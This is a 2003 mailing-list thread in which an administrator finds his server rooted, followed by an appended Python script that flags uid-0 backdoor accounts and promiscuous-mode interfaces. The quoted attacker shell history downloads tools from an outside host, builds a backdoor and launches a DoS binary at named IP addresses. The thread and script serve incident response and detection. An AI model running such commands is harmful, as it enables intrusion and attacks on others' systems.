
Re: Strange segmentation faults and Zombies



Backup /etc and any other data you have, and you can reference your configuration files later
during your re-install.

At this point, re-installation is a must. Never delude yourself into thinking you can 'recover'
from being rooted. Sure, you might be able to do so after a lot of effort, etc., but then again maybe
you'll forget something and a backdoor will remain. Best bet is to re-install, referencing your
existing configuration files (though I would NOT use them as-is without inspection, since they
could potentially have backdoored the configs as well).

Good luck.

Josh


Markus Schabel (markus.schabel@tgm.ac.at) wrote:
> Laurent Corbes {Caf'} wrote:
> >On Wed, 17 Sep 2003 22:29:58 +0200
> >Markus Schabel <markus.schabel@tgm.ac.at> wrote:
> >
> >
> >>I've seen some strange things on my (stable with security-updates)
> >>server: the last apt-get update didn't work because gzip segfaulted.
> >>I've copied gzip from another server over the version on this server,
> >>but it also crashed. Interesting was that the executable was bigger
> >>after the segfault.
> >
> >
> >curious.
> >
> >
> >>In a ps I can see a lot of Zombies (rm, ln, readlink, grep) and I've no
> >>idea where they come from.
> >
> >
> >it's the daily cronjob that stole.
> 
> yes, and that's reproducible :(
> 
> >>You think the server got hacked? Are there any other things that can
> >>lead to this? man also behaves strange, it says either "No manual entry
> >>for...", "What manual page do you want?" or nothing.
> >
> >
> >I'm thinking about a hardware problem.
> >Maybe the hard drive is failing (get the output of dmesg) or a very big
> >RAM problem that corrupts files on the hard drive.
> 
> request_module[net-pf-14]: waitpid(15400,...) failed, errno 1
> ptrace uses obsolete (PF_INET,SOCK_PACKET)
> eth0: Promiscuous mode enabled.
> device eth0 entered promiscuous mode
> eth0: Promiscuous mode enabled.
> 
> but nothing about the disks
> 
> >in every case simply copy all the data you can and inspect the hdd in
> >another box mounting it read only.
> 
> setuid.changes lists /dev/* and the following programs:
> pppd
> postdrop
> postqueue
> wall
> newgrp
> at
> chage
> chfn
> chsh
> expiry
> gpasswd
> passwd
> write
> crontab
> dotlockfile
> ssh-keysign
> procmail
> lockfile
> popauth
> pt_chown
> traceroute
> mount
> umount
> login
> su
> ping
> suexec
> /usr/lib/mc/bin/cons.saver
> 
> and a new user exists in /etc/passwd: slacks:x:0:0::/etc/.rpn:/bin/bash
> 
> in /etc/.rpn there's a .bash_history with the following content:
> 
> >id
> >mkdir /etc/.rpn
> >ps -aux
> >ps -aux | grep tbk
> >kill -15292 pid
> >kill 15292
> >netconf
> >locate httpd.conf
> >cd /etc/.rpn
> >ls -al
> >wget
> >cd /var/www/cncmap/www/upload/renegade
> >ls -al
> >rm -rf phpshell.php
> >cat bd.c
> >gcc -o bd bd.c
> >ftp ftp.hpg.com.br
> >rm -rf bd.c
> >cd /tmp
> >cd /etc/.rpn
> >wget www.slacks.hpg.com.br/psyBNC.tar.gz
> >tar zvxf psyBNC.tar.gz
> >tar -zvxf psyBNC.tar.gz
> >tar
> >gunzip psyBNC.tar.gz
> >tar -Acdtrux psyBNC.tar.gz
> >tar -x psyBNC.tar.gz
> >tar -Acd psyBNC.tar.gz
> >tar -cd psyBNC.tar.gz
> >tar --help
> >pwd
> >ls
> >rm -rf *
> >wget www.slacks.hpg.com.br/bin/dos
> >chmod +x dos
> >./dos
> >./dos 200.101.87.8 65535 8569
> >./dos 200.199.95.11 65535 8569
> 
> and the executable dos
> 
> interesting is the line "tar --help" :D
> 
> in "last" I see the following:
> 
> >slacks   pts/0        Sun Sep 14 02:26 - 03:37  (01:11)     
> >200-147-107-35.tlm.dialuol.com.br
> 
> IP of the hacker is 200.147.107.35
> I think we have no chance of legal actions against .br?
> 
> in the directory /var/www/cncmap/www/upload/renegade there are the
> following files: backhole.pl
> e.c ("Copyright (c) 2003 DTORS Security, ANGELO ROSIELLO 18/02/2003, 
> LES-EXPLOIT for Linux x86")
> rem.php (phpRemoteView)
> 
> so we got hacked :(
> 
> what information should we gather before we reinstall the complete
> server? I think we have to reinstall the whole thing or do you have
> any ideas?
> 
> thanks
> Markus
> 
> 



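A defender-side check for two of the indicators Markus quotes above (an extra uid-0 account whose home is a hidden directory under /etc, and the kernel's promiscuous-mode messages in dmesg), as an added example that is not part of the original thread. The passwd and dmesg lines are constructed samples modelled on the quoted output, not the real files from the compromised server.

```python
import re

# Constructed sample input modelled on the indicators quoted in the thread,
# not the real files from the compromised server.
PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
alice:x:1000:1000:Alice:/home/alice:/bin/bash
slacks:x:0:0::/etc/.rpn:/bin/bash
"""

DMESG = """eth0: Link is up
request_module[net-pf-14]: waitpid(15400,...) failed, errno 1
ptrace uses obsolete (PF_INET,SOCK_PACKET)
eth0: Promiscuous mode enabled.
device eth0 entered promiscuous mode
"""

def suspicious_accounts(passwd_text):
    """Flag accounts that look like a backdoor login: a uid-0 account other
    than root, a home under a hidden directory, or a home under /etc."""
    findings = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) != 7:          # skip blank or malformed lines
            continue
        name, _, uid, _, _, home, _ = fields
        reasons = []
        if uid == "0" and name != "root":
            reasons.append("uid 0")
        if any(p.startswith(".") for p in home.split("/") if p):
            reasons.append("hidden home dir")
        if home.startswith("/etc/"):
            reasons.append("home under /etc")
        if reasons:
            findings.append((name, reasons))
    return findings

def promisc_interfaces(dmesg_text):
    """Interfaces the kernel reported in promiscuous mode (a sniffer indicator)."""
    pat = re.compile(r"(?:device )?(\w+)(?:: Promiscuous mode enabled| entered promiscuous mode)")
    return sorted({m.group(1) for m in map(pat.search, dmesg_text.splitlines()) if m})

if __name__ == "__main__":
    for name, why in suspicious_accounts(PASSWD):
        print(f"suspicious account {name}: {', '.join(why)}")
    for iface in promisc_interfaces(DMESG):
        print(f"{iface} was put into promiscuous mode")
```

On a live box, run the same functions over the real /etc/passwd and `dmesg` output from the disk mounted read-only in another machine, as Laurent suggests, rather than trusting the compromised system's own binaries.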